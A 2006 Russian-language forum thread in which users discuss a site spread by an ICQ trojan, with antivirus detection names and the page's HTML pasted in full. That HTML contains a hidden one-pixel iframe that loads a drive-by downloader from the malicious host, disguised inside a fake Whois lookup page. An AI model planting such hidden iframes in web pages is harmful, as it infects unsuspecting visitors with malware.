Главная страницаСоздание сайтовБлог Кузнецова М.В.Статьи о PHPPHP-скриптыСтатьи об ApacheФорум С++КонсультацииФорум "Про Жизнь"
Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
MySQL 5. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. PHP на примерах (2 издание). Авторы: Кузнецов М.В., Симдянов И.В. PHP 5/6. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. C++. Мастер-класс в задачах и примерах. Авторы: Кузнецов М.В., Симдянов И.В. Самоучитель PHP 5 / 6 (3 издание). Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ 		Консультационный центр SoftTime

Разное
Вход  Регистрация  Список форумов  Живой форум  Архив  RSS-канал  Правила форума  Участники "Online"  Все участники

Выбрать другой форум

 

Здравствуйте, Посетитель!

 Новая тема

 Поиск

  Список тем

вид форума:
Линейный форум Структурный форум

тема: вирь на www.counter-pr.info

следующая тема
 
 автор: PantiL   (30.12.2006 в 22:51)   письмо автору
  
 

Мне знакомый сказал что новый icq троян рассылает сообщения с приглашением на данный сайт, и мол заражает все, просто ужас какой-то
Я считал содержимое страницы php скриптом , посмотрел в блокноте, ничегошеньки странного не заметил и решился всетаки перейти браузером, интересно мне было, и сразу же avast заорал - троян, троян!
Идентифицировал его вот так Win32:Cimuz-Q [Trj]
И зараза не хочет удаляться теперь, но зато и никаких вроде бы действий не ведет, хотя должет рассылать всем по асе сообщения с приглашением на сайт от моего имени

   
 
 автор: Poison   (30.12.2006 в 23:54)   письмо автору
  
   для: PantiL   (30.12.2006 в 22:51)
 

А странногго ты ничего и ненайдешь:) кроме обычной ссылки

   
 
 автор: PantiL   (31.12.2006 в 00:01)   письмо автору
  
   для: Poison   (30.12.2006 в 23:54)
 

Вот HTML код опасной страницы

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<iframe src="http://counter-pr.info/sp_pack/counter/index.php" width=1 height=1></iframe>
<head>
    <title>Whois lookup and Domain name search</title>
</head>

<body><div align="center">
<br>
<br>
<br>
<br><br>
<BR>


<table border=0>
<tr>
<td>
<img src="http://img.domaintools.com/whois.source.jpg" width="411" height="57" alt="Whois Source" border="0"></td>
</tr>
<tr>
<td><font size='5'>Enter a Domain for a Whois Lookup</font></td>
</tr>
<tr>
<td>
<form action="http://www.domaintools.com/go/" method="get">
    <input type="hidden" name="service" value="whois" />
        <input name="q" type="text"  value="" maxlength="60" size="40" style="font-size: 156%"/>
        <input type="submit"  value="Lookup" size="40" style="font-size: 126%" />
</td>
</tr>
<tr>
<td>
Whois.sc was renamed <a href="http://www.domaintools.com/">Domain Tools</a>. 
Please change your bookmarks to perform a <a href="http://whois.domaintools.com">whois</a>.
</td>
</tr>
</table>

</form>
</div>
</body>
</html>

   
 
 автор: LuxeMate   (31.12.2006 в 00:31)   письмо автору
  
   для: PantiL   (31.12.2006 в 00:01)
 

Это только содержимое страницы которую вы видете в браузере)) а на самом деле там на сервере наверное в PHP что нить типа system(get trojan.exe); :D:D:D
Это был просто пример)))

Kaspersky определил что это якобы Trojan-Downloader.JS.Pdyme.ct,вотс...)))

   
 
 автор: PantiL   (31.12.2006 в 00:43)   письмо автору
  
   для: LuxeMate   (31.12.2006 в 00:31)
 

При онлайн проврке Каспер определил троян как Trojan-Proxy.Win32.Cimuz.bw

   
 
 автор: LuxeMate   (31.12.2006 в 02:13)   письмо автору
  
   для: PantiL   (31.12.2006 в 00:43)
 

Это тот что у вас на компьютере щас лежит? Просто там на сайте как раз Trojan-Downloader,который и загружает на ваш компьютер троянскую программу,Kaspersky SC даже выролнится не дал ему...смял его и заблокировал))

   
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования